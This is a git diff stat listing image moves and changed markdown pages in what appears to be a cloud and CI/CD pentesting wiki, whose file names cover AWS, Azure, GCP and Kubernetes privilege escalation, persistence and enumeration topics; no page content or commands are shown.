.../assets => src/images}/image (325).png | Bin .../assets => src/images}/image (326).png | Bin .../assets => src/images}/image (327).png | Bin .../assets => src/images}/image (328).png | Bin .../assets => src/images}/image (329).png | Bin .../assets => src/images}/image (33).png | Bin .../assets => src/images}/image (330).png | Bin .../assets => src/images}/image (331).png | Bin 
.../assets => src/images}/image (332).png | Bin .../assets => src/images}/image (333).png | Bin .../assets => src/images}/image (334).png | Bin .../assets => src/images}/image (335).png | Bin .../assets => src/images}/image (336).png | Bin .../assets => src/images}/image (337).png | Bin .../assets => src/images}/image (338).png | Bin .../assets => src/images}/image (339).png | Bin .../assets => src/images}/image (34).png | Bin .../assets => src/images}/image (340).png | Bin .../assets => src/images}/image (341).png | Bin .../assets => src/images}/image (342).png | Bin .../assets => src/images}/image (343).png | Bin .../assets => src/images}/image (344).png | Bin .../assets => src/images}/image (345).png | Bin .../assets => src/images}/image (346).png | Bin .../assets => src/images}/image (347).png | Bin .../assets => src/images}/image (348).png | Bin .../assets => src/images}/image (349).png | Bin .../assets => src/images}/image (35).png | Bin .../assets => src/images}/image (350).png | Bin .../assets => src/images}/image (351).png | Bin .../assets => src/images}/image (352).png | Bin .../assets => src/images}/image (353).png | Bin .../assets => src/images}/image (354).png | Bin .../assets => src/images}/image (355).png | Bin .../assets => src/images}/image (356).png | Bin .../assets => src/images}/image (36).png | Bin .../assets => src/images}/image (37).png | Bin .../assets => src/images}/image (38) (1).png | Bin .../assets => src/images}/image (38).png | Bin .../assets => src/images}/image (39) (1).png | Bin .../assets => src/images}/image (39).png | Bin ...ge (4) (1) (1) (1) (1) (1) (1) (1) (1).png | Bin .../image (4) (1) (1) (1) (1) (1) (1) (1).png | Bin .../image (4) (1) (1) (1) (1) (1) (1).png | Bin .../images}/image (4) (1) (1) (1) (1) (1).png | Bin .../images}/image (4) (1) (1) (1) (1).png | Bin .../images}/image (4) (1) (1) (1).png | Bin .../images}/image (4) (1) (1).png | Bin .../images}/image (4) (1) (2).png | Bin .../images}/image (4) (1) (3).png | Bin 
.../assets => src/images}/image (4) (1).png | Bin .../images}/image (4) (2) (1).png | Bin .../assets => src/images}/image (4) (2).png | Bin .../assets => src/images}/image (4) (3).png | Bin .../assets => src/images}/image (4) (4).png | Bin .../assets => src/images}/image (4) (5).png | Bin .../assets => src/images}/image (4) (6).png | Bin .../assets => src/images}/image (4) (7).png | Bin {.gitbook/assets => src/images}/image (4).png | Bin .../assets => src/images}/image (40).png | Bin .../assets => src/images}/image (41).png | Bin .../assets => src/images}/image (42).png | Bin .../assets => src/images}/image (43).png | Bin .../assets => src/images}/image (44).png | Bin .../assets => src/images}/image (45).png | Bin .../assets => src/images}/image (46).png | Bin .../assets => src/images}/image (47).png | Bin .../assets => src/images}/image (48).png | Bin .../assets => src/images}/image (49).png | Bin .../images}/image (5) (1) (1) (1) (1) (1).png | Bin .../images}/image (5) (1) (1) (1) (1).png | Bin .../images}/image (5) (1) (1) (1).png | Bin .../images}/image (5) (1) (1) (2).png | Bin .../images}/image (5) (1) (1).png | Bin .../assets => src/images}/image (5) (1).png | Bin .../images}/image (5) (2) (1).png | Bin .../assets => src/images}/image (5) (2).png | Bin .../assets => src/images}/image (5) (3).png | Bin .../assets => src/images}/image (5) (4).png | Bin {.gitbook/assets => src/images}/image (5).png | Bin .../assets => src/images}/image (50).png | Bin .../assets => src/images}/image (51).png | Bin .../assets => src/images}/image (52).png | Bin .../assets => src/images}/image (53).png | Bin .../assets => src/images}/image (54).png | Bin .../assets => src/images}/image (55).png | Bin .../assets => src/images}/image (56).png | Bin .../assets => src/images}/image (57).png | Bin .../assets => src/images}/image (58).png | Bin .../assets => src/images}/image (59).png | Bin .../images}/image (6) (1) (1) (1).png | Bin .../images}/image (6) (1) (1).png | Bin 
.../images}/image (6) (1) (2).png | Bin .../assets => src/images}/image (6) (1).png | Bin .../assets => src/images}/image (6) (2).png | Bin .../assets => src/images}/image (6) (3).png | Bin {.gitbook/assets => src/images}/image (6).png | Bin .../assets => src/images}/image (60).png | Bin .../assets => src/images}/image (61).png | Bin .../assets => src/images}/image (62).png | Bin .../assets => src/images}/image (63).png | Bin .../assets => src/images}/image (64).png | Bin .../assets => src/images}/image (65).png | Bin .../assets => src/images}/image (66).png | Bin .../assets => src/images}/image (67).png | Bin .../assets => src/images}/image (68).png | Bin .../assets => src/images}/image (69).png | Bin .../images}/image (7) (1) (1) (1).png | Bin .../images}/image (7) (1) (1) (2).png | Bin .../images}/image (7) (1) (1).png | Bin .../images}/image (7) (1) (2) (1).png | Bin .../images}/image (7) (1) (2).png | Bin .../assets => src/images}/image (7) (1).png | Bin .../assets => src/images}/image (7) (2).png | Bin {.gitbook/assets => src/images}/image (7).png | Bin .../assets => src/images}/image (70).png | Bin .../assets => src/images}/image (71).png | Bin .../assets => src/images}/image (72).png | Bin .../assets => src/images}/image (73).png | Bin .../assets => src/images}/image (74).png | Bin .../assets => src/images}/image (75).png | Bin .../assets => src/images}/image (76).png | Bin .../assets => src/images}/image (77).png | Bin .../assets => src/images}/image (78).png | Bin .../assets => src/images}/image (79).png | Bin .../images}/image (8) (1) (1) (1) (1) (1).png | Bin .../images}/image (8) (1) (1) (1) (1).png | Bin .../images}/image (8) (1) (1) (1).png | Bin .../images}/image (8) (1) (1).png | Bin .../assets => src/images}/image (8) (1).png | Bin .../assets => src/images}/image (8) (2).png | Bin .../assets => src/images}/image (8) (3).png | Bin {.gitbook/assets => src/images}/image (8).png | Bin .../assets => src/images}/image (80).png | Bin .../assets => 
src/images}/image (81).png | Bin .../assets => src/images}/image (82).png | Bin .../assets => src/images}/image (83) (1).png | Bin .../assets => src/images}/image (83).png | Bin .../assets => src/images}/image (84).png | Bin .../assets => src/images}/image (85) (1).png | Bin .../assets => src/images}/image (85).png | Bin .../assets => src/images}/image (86).png | Bin .../assets => src/images}/image (87) (1).png | Bin .../assets => src/images}/image (87).png | Bin .../assets => src/images}/image (88).png | Bin .../assets => src/images}/image (89) (1).png | Bin .../assets => src/images}/image (89).png | Bin .../images}/image (9) (1) (1) (1) (1).png | Bin .../images}/image (9) (1) (1) (1).png | Bin .../images}/image (9) (1) (1).png | Bin .../assets => src/images}/image (9) (1).png | Bin .../assets => src/images}/image (9) (2).png | Bin {.gitbook/assets => src/images}/image (9).png | Bin .../assets => src/images}/image (90).png | Bin .../assets => src/images}/image (91).png | Bin .../images}/image (92) (1) (1).png | Bin .../assets => src/images}/image (92) (1).png | Bin .../assets => src/images}/image (92).png | Bin .../assets => src/images}/image (93).png | Bin .../assets => src/images}/image (94).png | Bin .../assets => src/images}/image (95).png | Bin .../assets => src/images}/image (96).png | Bin .../assets => src/images}/image (97).png | Bin .../assets => src/images}/image (98).png | Bin .../assets => src/images}/image (99).png | Bin {.gitbook/assets => src/images}/image.png | Bin ...enshift-missing-service-account-image1.png | Bin ...enshift-missing-service-account-image2.png | Bin src/images/sponsor_8ksec.png | Bin 0 -> 14775 bytes src/images/sponsor_hackenproof.jpeg | Bin 0 -> 4251 bytes src/images/sponsor_intigriti.png | Bin 0 -> 28251 bytes src/images/sponsor_pentesttools.webp | Bin 0 -> 3286 bytes src/images/sponsor_rootedcon.png | Bin 0 -> 24857 bytes src/images/sponsor_stm.png | Bin 0 -> 5481 bytes src/images/sponsor_trickest.jpeg | Bin 0 -> 4237 bytes 
...m-cloud-document-4-5875069018120918586.jpg | Bin ...oud-photo-size-4-5780773316536156543-x.jpg | Bin ...oud-photo-size-4-5782633230648853886-y.jpg | Bin ...oud-photo-size-4-5920521132757336440-y.jpg | Bin ...oud-photo-size-4-6044191430395675441-x.jpg | Bin ...ower-awx-automation-controller-security.md | 142 +-- .../apache-airflow-security/README.md | 58 +- .../airflow-configuration.md | 111 ++ .../apache-airflow-security/airflow-rbac.md | 50 +- .../pentesting-ci-cd}/atlantis-security.md | 220 ++-- .../pentesting-ci-cd}/circleci-security.md | 101 +- .../cloudflare-security/README.md | 134 ++ .../cloudflare-security/cloudflare-domains.md | 133 ++ .../cloudflare-zero-trust-network.md | 61 + .../concourse-security/README.md | 33 + .../concourse-architecture.md | 38 + .../concourse-enumeration-and-attacks.md | 238 ++-- .../concourse-lab-creation.md | 98 +- .../gitea-security/README.md | 79 +- .../gitea-security/basic-gitea-information.md | 103 ++ .../github-security/README.md | 195 ++- .../abusing-github-actions/README.md | 292 ++--- .../gh-actions-artifact-poisoning.md | 0 .../gh-actions-cache-poisoning.md | 0 .../gh-actions-context-script-injections.md | 0 .../accessible-deleted-data-in-github.md | 56 + .../basic-github-information.md | 203 ++- .../jenkins-security/README.md | 173 ++- .../basic-jenkins-information.md | 78 +- ...itrary-file-read-to-rce-via-remember-me.md | 105 ++ .../jenkins-dumping-secrets-from-groovy.md | 35 +- ...jenkins-rce-creating-modifying-pipeline.md | 39 + .../jenkins-rce-creating-modifying-project.md | 36 + .../jenkins-rce-with-groovy-script.md | 63 + .../pentesting-ci-cd}/okta-security/README.md | 81 +- .../okta-security/okta-hardening.md | 60 +- .../pentesting-ci-cd-methodology.md | 113 +- .../serverless.com-security.md | 502 ++++---- .../pentesting-ci-cd}/supabase-security.md | 84 +- .../pentesting-ci-cd}/terraform-security.md | 121 +- src/pentesting-ci-cd/todo.md | 16 + .../travisci-security/README.md | 65 + 
.../basic-travisci-information.md | 44 +- src/pentesting-ci-cd/vercel-security.md | 437 +++++++ .../pentesting-cloud}/aws-security/README.md | 209 ++-- .../aws-basic-information/README.md | 170 ++- .../aws-federation-abuse.md | 82 +- .../aws-permissions-for-a-pentest.md | 17 + .../aws-security/aws-persistence/README.md | 0 .../aws-api-gateway-persistence.md | 32 + .../aws-cognito-persistence.md | 42 + .../aws-dynamodb-persistence.md | 63 + .../aws-persistence/aws-ec2-persistence.md | 54 + .../aws-persistence/aws-ecr-persistence.md | 97 ++ .../aws-persistence/aws-ecs-persistence.md | 51 +- .../aws-persistence/aws-efs-persistence.md | 21 + .../aws-elastic-beanstalk-persistence.md | 41 +- .../aws-persistence/aws-iam-persistence.md | 49 + .../aws-persistence/aws-kms-persistence.md | 39 + .../aws-lambda-persistence/README.md | 64 + .../aws-abusing-lambda-extensions.md | 42 + .../aws-lambda-layers-persistence.md | 66 +- .../aws-lightsail-persistence.md | 33 + .../aws-persistence/aws-rds-persistence.md | 31 + .../aws-persistence/aws-s3-persistence.md | 25 + .../aws-secrets-manager-persistence.md | 53 + .../aws-persistence/aws-sns-persistence.md | 81 ++ .../aws-persistence/aws-sqs-persistence.md | 39 + .../aws-persistence/aws-ssm-perssitence.md | 0 .../aws-step-functions-persistence.md | 21 + .../aws-persistence/aws-sts-persistence.md | 41 +- .../aws-post-exploitation/README.md | 0 .../aws-api-gateway-post-exploitation.md | 73 +- .../aws-cloudfront-post-exploitation.md | 31 + .../aws-codebuild-post-exploitation/README.md | 84 ++ .../aws-codebuild-token-leakage.md | 188 +++ .../aws-control-tower-post-exploitation.md | 20 + .../aws-dlm-post-exploitation.md | 30 +- .../aws-dynamodb-post-exploitation.md | 127 +- .../README.md | 226 ++-- .../aws-ebs-snapshot-dump.md | 55 +- .../aws-malicious-vpc-mirror.md | 15 + .../aws-ecr-post-exploitation.md | 44 +- .../aws-ecs-post-exploitation.md | 63 + .../aws-efs-post-exploitation.md | 54 + .../aws-eks-post-exploitation.md | 115 +- 
...aws-elastic-beanstalk-post-exploitation.md | 80 ++ .../aws-iam-post-exploitation.md | 103 ++ .../aws-kms-post-exploitation.md | 133 ++ .../aws-lambda-post-exploitation/README.md | 29 + .../aws-warm-lambda-persistence.md | 63 + .../aws-lightsail-post-exploitation.md | 30 + .../aws-organizations-post-exploitation.md | 19 + .../aws-rds-post-exploitation.md | 49 +- .../aws-s3-post-exploitation.md | 36 +- .../aws-secrets-manager-post-exploitation.md | 49 + .../aws-ses-post-exploitation.md | 83 ++ .../aws-sns-post-exploitation.md | 42 +- .../aws-sqs-post-exploitation.md | 36 +- ...sso-and-identitystore-post-exploitation.md | 25 + .../aws-stepfunctions-post-exploitation.md | 74 ++ .../aws-sts-post-exploitation.md | 54 +- .../aws-vpn-post-exploitation.md | 13 + .../aws-privilege-escalation/README.md | 23 + .../aws-apigateway-privesc.md | 57 +- .../aws-chime-privesc.md | 9 + .../aws-cloudformation-privesc/README.md | 46 +- ...stack-and-cloudformation-describestacks.md | 81 ++ .../aws-codebuild-privesc.md | 120 +- .../aws-codepipeline-privesc.md | 37 + .../aws-codestar-privesc/README.md | 73 ++ ...ateproject-codestar-associateteammember.md | 81 ++ .../iam-passrole-codestar-createproject.md | 88 ++ .../aws-cognito-privesc.md | 48 +- .../aws-datapipeline-privesc.md | 74 ++ .../aws-directory-services-privesc.md | 34 + .../aws-dynamodb-privesc.md | 23 + .../aws-ebs-privesc.md | 27 + .../aws-ec2-privesc.md | 80 +- .../aws-ecr-privesc.md | 108 ++ .../aws-ecs-privesc.md | 72 +- .../aws-efs-privesc.md | 38 +- .../aws-elastic-beanstalk-privesc.md | 143 +-- .../aws-emr-privesc.md | 64 + .../aws-privilege-escalation/aws-gamelift.md | 18 + .../aws-glue-privesc.md | 32 +- .../aws-iam-privesc.md | 93 +- .../aws-kms-privesc.md | 122 ++ .../aws-lambda-privesc.md | 75 +- .../aws-lightsail-privesc.md | 47 +- .../aws-mediapackage-privesc.md | 25 + .../aws-mq-privesc.md | 49 + .../aws-msk-privesc.md | 24 + .../aws-organizations-prinvesc.md | 18 + .../aws-rds-privesc.md | 83 +- 
.../aws-redshift-privesc.md | 107 ++ .../aws-s3-privesc.md | 75 +- .../aws-sagemaker-privesc.md | 83 +- .../aws-secrets-manager-privesc.md | 51 + .../aws-sns-privesc.md | 43 + .../aws-sqs-privesc.md | 46 + .../aws-ssm-privesc.md | 49 +- .../aws-sso-and-identitystore-privesc.md | 70 +- .../aws-stepfunctions-privesc.md | 94 +- .../aws-sts-privesc.md | 122 ++ .../aws-workdocs-privesc.md | 10 +- .../eventbridgescheduler-privesc.md | 49 + ...acm-pca-issuecertificate-acm-pca-getcer.md | 32 + .../aws-security/aws-services/README.md | 31 + .../aws-services/aws-api-gateway-enum.md | 100 +- ...m-and-private-certificate-authority-pca.md | 30 +- .../aws-cloudformation-and-codestar-enum.md | 75 ++ .../aws-services/aws-cloudfront-enum.md | 44 + .../aws-services/aws-cloudhsm-enum.md | 30 +- .../aws-services/aws-codebuild-enum.md | 76 ++ .../aws-services/aws-cognito-enum/README.md | 102 ++ .../cognito-identity-pools.md | 82 +- .../aws-cognito-enum/cognito-user-pools.md | 173 ++- ...e-codepipeline-codebuild-and-codecommit.md | 52 +- .../aws-directory-services-workdocs-enum.md | 68 +- .../aws-services/aws-documentdb-enum.md | 42 + .../aws-services/aws-dynamodb-enum.md | 80 +- .../README.md | 146 +-- .../aws-nitro-enum.md | 73 +- ...ws-vpc-and-networking-basic-information.md | 180 ++- .../aws-security/aws-services/aws-ecr-enum.md | 102 ++ .../aws-security/aws-services/aws-ecs-enum.md | 82 ++ .../aws-security/aws-services/aws-efs-enum.md | 102 +- .../aws-security/aws-services/aws-eks-enum.md | 46 + .../aws-elastic-beanstalk-enum.md | 101 +- .../aws-services/aws-elasticache.md | 45 + .../aws-security/aws-services/aws-emr-enum.md | 60 + .../aws-security/aws-services/aws-iam-enum.md | 168 +-- .../aws-kinesis-data-firehose-enum.md | 51 + .../aws-security/aws-services/aws-kms-enum.md | 158 +++ .../aws-services/aws-lambda-enum.md | 72 +- .../aws-services/aws-lightsail-enum.md | 59 + .../aws-security/aws-services/aws-mq-enum.md | 76 ++ .../aws-security/aws-services/aws-msk-enum.md | 52 +- 
.../aws-services/aws-organizations-enum.md | 47 + .../aws-services/aws-other-services-enum.md | 24 + .../aws-services/aws-redshift-enum.md | 40 +- .../aws-relational-database-rds-enum.md | 100 +- .../aws-services/aws-route53-enum.md | 31 + .../aws-s3-athena-and-glacier-enum.md | 147 +-- .../aws-services/aws-secrets-manager-enum.md | 50 + .../README.md | 0 .../aws-cloudtrail-enum.md | 157 +-- .../aws-cloudwatch-enum.md | 215 ++-- .../aws-config-enum.md | 56 +- .../aws-control-tower-enum.md | 42 + .../aws-cost-explorer-enum.md | 15 + .../aws-detective-enum.md | 16 + .../aws-firewall-manager-enum.md | 119 +- .../aws-guardduty-enum.md | 127 +- .../aws-inspector-enum.md | 173 ++- .../aws-macie-enum.md | 118 ++ .../aws-security-hub-enum.md | 63 + .../aws-shield-enum.md | 15 + .../aws-trusted-advisor-enum.md | 71 ++ .../aws-waf-enum.md | 284 ++--- .../aws-security/aws-services/aws-ses-enum.md | 43 +- .../aws-security/aws-services/aws-sns-enum.md | 79 ++ .../aws-services/aws-sqs-and-sns-enum.md | 53 + .../aws-services/aws-stepfunctions-enum.md | 295 +++-- .../aws-security/aws-services/aws-sts-enum.md | 100 ++ .../aws-services/eventbridgescheduler-enum.md | 81 ++ .../aws-unauthenticated-enum-access/README.md | 54 + .../aws-accounts-unauthenticated-enum.md | 45 + .../aws-api-gateway-unauthenticated-enum.md | 56 + .../aws-cloudfront-unauthenticated-enum.md | 11 + .../aws-codebuild-unauthenticated-access.md | 35 + .../aws-cognito-unauthenticated-enum.md | 40 +- .../aws-documentdb-enum.md | 11 + .../aws-dynamodb-unauthenticated-access.md | 15 + .../aws-ec2-unauthenticated-enum.md | 60 + .../aws-ecr-unauthenticated-enum.md | 34 + .../aws-ecs-unauthenticated-enum.md | 25 + ...-elastic-beanstalk-unauthenticated-enum.md | 37 + .../aws-elasticsearch-unauthenticated-enum.md | 12 + .../aws-iam-and-sts-unauthenticated-enum.md | 137 +-- ...ity-center-and-sso-unauthenticated-enum.md | 48 +- .../aws-iot-unauthenticated-enum.md | 13 + .../aws-kinesis-video-unauthenticated-enum.md | 11 + 
.../aws-lambda-unauthenticated-access.md | 22 + .../aws-media-unauthenticated-enum.md | 13 + .../aws-mq-unauthenticated-enum.md | 22 + .../aws-msk-unauthenticated-enum.md | 18 + .../aws-rds-unauthenticated-enum.md | 44 + .../aws-redshift-unauthenticated-enum.md | 11 + .../aws-s3-unauthenticated-enum.md | 85 +- .../aws-sns-unauthenticated-enum.md | 21 + .../aws-sqs-unauthenticated-enum.md | 23 + .../azure-security/README.md | 171 ++- .../az-basic-information/README.md | 323 +++-- .../az-tokens-and-public-applications.md | 120 +- .../azure-security/az-device-registration.md | 109 ++ .../azure-security/az-enumeration-tools.md | 79 +- .../README.md | 65 + .../az-arc-vulnerable-gpo-deploy-script.md | 32 +- .../az-local-cloud-credentials.md | 39 + .../az-pass-the-certificate.md | 39 + .../az-pass-the-cookie.md | 37 + ...g-primary-refresh-token-microsoft-entra.md | 7 + .../az-primary-refresh-token-prt.md | 7 + .../az-processes-memory-access-token.md | 37 + .../README.md | 60 + .../az-cloud-kerberos-trust.md | 47 +- .../az-default-applications.md | 9 + .../az-synchronising-new-users.md | 32 + .../federation.md | 100 +- .../phs-password-hash-sync.md | 60 +- .../pta-pass-through-authentication.md | 70 ++ .../seamless-sso.md | 78 +- .../pass-the-prt.md | 109 +- .../az-permissions-for-a-pentest.md | 7 + .../azure-security/az-persistence/README.md | 38 +- .../az-persistence/az-queue-persistance.md | 31 + .../az-persistence/az-storage-persistence.md | 41 + .../az-persistence/az-vms-persistence.md | 25 + .../az-post-exploitation/README.md | 0 .../az-blob-storage-post-exploitation.md | 45 + .../az-file-share-post-exploitation.md | 48 + .../az-function-apps-post-exploitation.md | 17 + .../az-key-vault-post-exploitation.md | 46 +- .../az-queue-post-exploitation.md | 56 +- .../az-servicebus-post-exploitation.md | 75 +- .../az-sql-post-exploitation.md | 50 +- .../az-table-storage-post-exploitation.md | 64 + .../az-vms-and-network-post-exploitation.md | 63 +- 
.../az-privilege-escalation/README.md | 0 .../az-app-services-privesc.md | 39 + .../az-authorization-privesc.md | 59 +- .../az-entraid-privesc/README.md | 101 +- ...-conditional-access-policies-mfa-bypass.md | 80 +- .../az-entraid-privesc/dynamic-groups.md | 50 + .../az-functions-app-privesc.md | 124 +- .../az-key-vault-privesc.md | 34 + .../az-queue-privesc.md | 52 +- .../az-servicebus-privesc.md | 53 +- .../az-privilege-escalation/az-sql-privesc.md | 57 +- .../az-storage-privesc.md | 68 +- ...az-virtual-machines-and-network-privesc.md | 118 +- .../azure-security/az-services/README.md | 73 ++ .../azure-security/az-services/az-acr.md | 52 + .../az-services/az-app-service.md | 86 +- .../az-services/az-application-proxy.md | 40 + .../az-services/az-arm-templates.md | 31 + .../az-automation-account/README.md | 90 +- .../az-state-configuration-rce.md | 65 + .../azure-security/az-services/az-azuread.md | 420 ++++--- .../az-services/az-file-shares.md | 139 +-- .../az-services/az-function-apps.md | 144 +-- .../az-services/az-logic-apps.md | 56 +- ...roups-subscriptions-and-resource-groups.md | 56 + .../az-services/az-queue-enum.md | 95 ++ .../az-services/az-servicebus-enum.md | 77 +- .../azure-security/az-services/az-sql.md | 136 +-- .../azure-security/az-services/az-storage.md | 258 ++-- .../az-services/az-table-storage.md | 109 ++ .../azure-security/az-services/intune.md | 31 + .../azure-security/az-services/keyvault.md | 92 +- .../azure-security/az-services/vms/README.md | 349 +++--- .../az-services/vms/az-azure-network.md | 303 +++-- .../README.md | 59 +- .../az-device-code-authentication-phishing.md | 7 + .../az-oauth-apps-phishing.md | 84 +- .../az-password-spraying.md | 35 + .../az-vms-unath.md | 41 + .../digital-ocean-pentesting/README.md | 43 + .../do-basic-information.md | 40 +- .../do-permissions-for-a-pentest.md | 7 + .../do-services/README.md | 19 + .../do-services/do-apps.md | 34 + .../do-services/do-container-registry.md | 33 + 
.../do-services/do-databases.md | 43 + .../do-services/do-droplets.md | 46 +- .../do-services/do-functions.md | 60 + .../do-services/do-images.md | 19 + .../do-services/do-kubernetes-doks.md | 39 + .../do-services/do-networking.md | 45 + .../do-services/do-projects.md | 23 + .../do-services/do-spaces.md | 46 + .../do-services/do-volumes.md | 15 + .../pentesting-cloud}/gcp-security/README.md | 158 +-- .../gcp-basic-information/README.md | 136 +-- .../gcp-federation-abuse.md | 153 +++ .../gcp-permissions-for-a-pentest.md | 0 .../gcp-security/gcp-persistence/README.md | 0 .../gcp-api-keys-persistence.md | 21 + .../gcp-app-engine-persistence.md | 21 + .../gcp-artifact-registry-persistence.md | 42 + .../gcp-bigquery-persistence.md | 21 + .../gcp-cloud-functions-persistence.md | 19 + .../gcp-cloud-run-persistence.md | 25 + .../gcp-cloud-shell-persistence.md | 69 ++ .../gcp-cloud-sql-persistence.md | 37 + .../gcp-compute-persistence.md | 19 + .../gcp-dataflow-persistence.md | 53 + .../gcp-filestore-persistence.md | 21 + .../gcp-logging-persistence.md | 21 + .../gcp-non-svc-persistance.md | 55 +- .../gcp-secret-manager-persistence.md | 22 + .../gcp-storage-persistence.md | 38 + .../gcp-post-exploitation/README.md | 0 .../gcp-app-engine-post-exploitation.md | 43 + ...gcp-artifact-registry-post-exploitation.md | 21 + .../gcp-cloud-build-post-exploitation.md | 29 + .../gcp-cloud-functions-post-exploitation.md | 35 +- .../gcp-cloud-run-post-exploitation.md | 23 + .../gcp-cloud-shell-post-exploitation.md | 46 +- .../gcp-cloud-sql-post-exploitation.md | 38 +- .../gcp-compute-post-exploitation.md | 73 +- .../gcp-filestore-post-exploitation.md | 100 ++ .../gcp-iam-post-exploitation.md | 29 + .../gcp-kms-post-exploitation.md | 50 +- .../gcp-logging-post-exploitation.md | 60 +- .../gcp-monitoring-post-exploitation.md | 114 ++ .../gcp-pub-sub-post-exploitation.md | 70 +- .../gcp-secretmanager-post-exploitation.md | 22 + .../gcp-security-post-exploitation.md | 58 + 
.../gcp-storage-post-exploitation.md | 34 + .../gcp-workflows-post-exploitation.md | 21 + .../gcp-privilege-escalation/README.md | 65 +- .../gcp-apikeys-privesc.md | 78 ++ .../gcp-appengine-privesc.md | 51 +- .../gcp-artifact-registry-privesc.md | 173 +++ .../gcp-batch-privesc.md | 58 + .../gcp-bigquery-privesc.md | 51 +- .../gcp-clientauthconfig-privesc.md | 26 + .../gcp-cloudbuild-privesc.md | 42 +- .../gcp-cloudfunctions-privesc.md | 63 +- .../gcp-cloudidentity-privesc.md | 34 + .../gcp-cloudscheduler-privesc.md | 50 +- .../gcp-composer-privesc.md | 52 +- .../gcp-compute-privesc/README.md | 71 +- .../gcp-add-custom-ssh-metadata.md | 100 ++ .../gcp-container-privesc.md | 91 ++ .../gcp-deploymentmaneger-privesc.md | 29 + .../gcp-iam-privesc.md | 52 +- .../gcp-kms-privesc.md | 40 +- ...local-privilege-escalation-ssh-pivoting.md | 54 +- .../gcp-misc-perms-privesc.md | 25 + .../gcp-network-docker-escape.md | 34 +- .../gcp-orgpolicy-privesc.md | 25 + .../gcp-pubsub-privesc.md | 37 + .../gcp-resourcemanager-privesc.md | 19 + .../gcp-run-privesc.md | 40 +- .../gcp-secretmanager-privesc.md | 38 + .../gcp-serviceusage-privesc.md | 29 +- .../gcp-sourcerepos-privesc.md | 87 ++ .../gcp-storage-privesc.md | 71 +- .../gcp-workflows-privesc.md | 62 +- .../gcp-security/gcp-services/README.md | 0 .../gcp-services/gcp-ai-platform-enum.md | 22 + .../gcp-services/gcp-api-keys-enum.md | 44 + .../gcp-services/gcp-app-engine-enum.md | 65 +- .../gcp-artifact-registry-enum.md | 68 +- .../gcp-services/gcp-batch-enum.md | 35 + .../gcp-services/gcp-bigquery-enum.md | 93 +- .../gcp-services/gcp-bigtable-enum.md | 32 + .../gcp-services/gcp-cloud-build-enum.md | 171 +++ .../gcp-services/gcp-cloud-functions-enum.md | 108 ++ .../gcp-services/gcp-cloud-run-enum.md | 111 ++ .../gcp-services/gcp-cloud-scheduler-enum.md | 46 + .../gcp-services/gcp-cloud-shell-enum.md | 28 + .../gcp-services/gcp-cloud-sql-enum.md | 89 ++ .../gcp-services/gcp-composer-enum.md | 43 + 
.../gcp-compute-instances-enum/README.md | 93 +- .../gcp-compute-instance.md | 74 +- .../gcp-vpc-and-networking.md | 69 +- .../gcp-containers-gke-and-composer-enum.md | 50 +- .../gcp-security/gcp-services/gcp-dns-enum.md | 25 + .../gcp-services/gcp-filestore-enum.md | 74 ++ .../gcp-services/gcp-firebase-enum.md | 40 +- .../gcp-services/gcp-firestore-enum.md | 17 + .../gcp-iam-and-org-policies-enum.md | 126 +- .../gcp-security/gcp-services/gcp-kms-enum.md | 66 +- .../gcp-services/gcp-logging-enum.md | 105 +- .../gcp-services/gcp-memorystore-enum.md | 21 + .../gcp-services/gcp-monitoring-enum.md | 57 + .../gcp-security/gcp-services/gcp-pub-sub.md | 48 +- .../gcp-services/gcp-secrets-manager-enum.md | 53 + .../gcp-services/gcp-security-enum.md | 114 +- .../gcp-source-repositories-enum.md | 67 + .../gcp-services/gcp-spanner-enum.md | 31 + .../gcp-services/gcp-stackdriver-enum.md | 33 + .../gcp-services/gcp-storage-enum.md | 73 +- .../gcp-services/gcp-workflows-enum.md | 38 + .../gcp-to-workspace-pivoting/README.md | 88 +- ...cp-understanding-domain-wide-delegation.md | 36 +- .../README.md | 18 + .../gcp-api-keys-unauthenticated-enum.md | 52 + .../gcp-app-engine-unauthenticated-enum.md | 25 + ...-artifact-registry-unauthenticated-enum.md | 21 + .../gcp-cloud-build-unauthenticated-enum.md | 42 + ...cp-cloud-functions-unauthenticated-enum.md | 77 ++ .../gcp-cloud-run-unauthenticated-enum.md | 59 + .../gcp-cloud-sql-unauthenticated-enum.md | 25 + .../gcp-compute-unauthenticated-enum.md | 25 + ...principals-and-org-unauthenticated-enum.md | 42 +- ...ource-repositories-unauthenticated-enum.md | 20 + .../README.md | 73 ++ ...gcp-public-buckets-privilege-escalation.md | 31 + .../ibm-cloud-pentesting/README.md | 38 + .../ibm-basic-information.md | 72 ++ .../ibm-hyper-protect-crypto-services.md | 30 +- .../ibm-hyper-protect-virtual-server.md | 30 +- .../kubernetes-security/README.md | 80 ++ .../README.md | 359 +++--- .../kubernetes-roles-abuse-lab.md | 61 +- 
.../pod-escape-privileges.md | 49 + .../attacking-kubernetes-from-inside-a-pod.md | 159 +-- .../exposing-services-in-kubernetes.md | 107 +- .../kubernetes-security/kubernetes-basics.md | 285 ++--- .../kubernetes-enumeration.md | 360 +++--- .../kubernetes-external-secrets-operator.md | 46 +- .../kubernetes-hardening/README.md | 96 +- .../kubernetes-securitycontext-s.md | 80 +- .../kubernetes-kyverno/README.md | 0 .../kubernetes-kyverno-bypass.md | 24 +- .../kubernetes-namespace-escalation.md | 33 + .../kubernetes-network-attacks.md | 151 +-- .../kubernetes-opa-gatekeeper/README.md | 0 .../kubernetes-opa-gatekeeper-bypass.md | 18 +- .../kubernetes-pivoting-to-clouds.md | 141 +-- ...bernetes-role-based-access-control-rbac.md | 107 +- ...bernetes-validatingwebhookconfiguration.md | 50 +- .../pentesting-kubernetes-services/README.md | 63 +- ...ubelet-authentication-and-authorization.md | 66 +- .../openshift-pentesting/README.md | 19 + .../openshift-basic-information.md | 16 +- .../openshift-jenkins/README.md | 6 +- .../openshift-jenkins-build-overrides.md | 0 .../openshift-privilege-escalation/README.md | 19 + .../openshift-missing-service-account.md | 8 +- .../openshift-scc-bypass.md | 80 +- .../openshift-tekton.md | 13 +- .../openshift-pentesting/openshift-scc.md | 16 +- .../pentesting-cloud-methodology.md | 236 ++-- .../workspace-security/README.md | 73 ++ .../gws-google-platforms-phishing/README.md | 123 +- .../gws-app-scripts.md | 235 ++++ .../workspace-security/gws-persistence.md | 182 +++ .../gws-post-exploitation.md | 46 +- .../README.md | 58 + .../gcds-google-cloud-directory-sync.md | 197 ++- ...-google-credential-provider-for-windows.md | 304 ++--- .../gps-google-password-sync.md | 203 ++- .../gws-admin-directory-sync.md | 53 +- theme/book.js | 735 +++++++++++ theme/css/chrome.css | 1085 +++++++++++++++++ theme/css/general.css | 242 ++++ theme/css/print.css | 50 + theme/css/variables.css 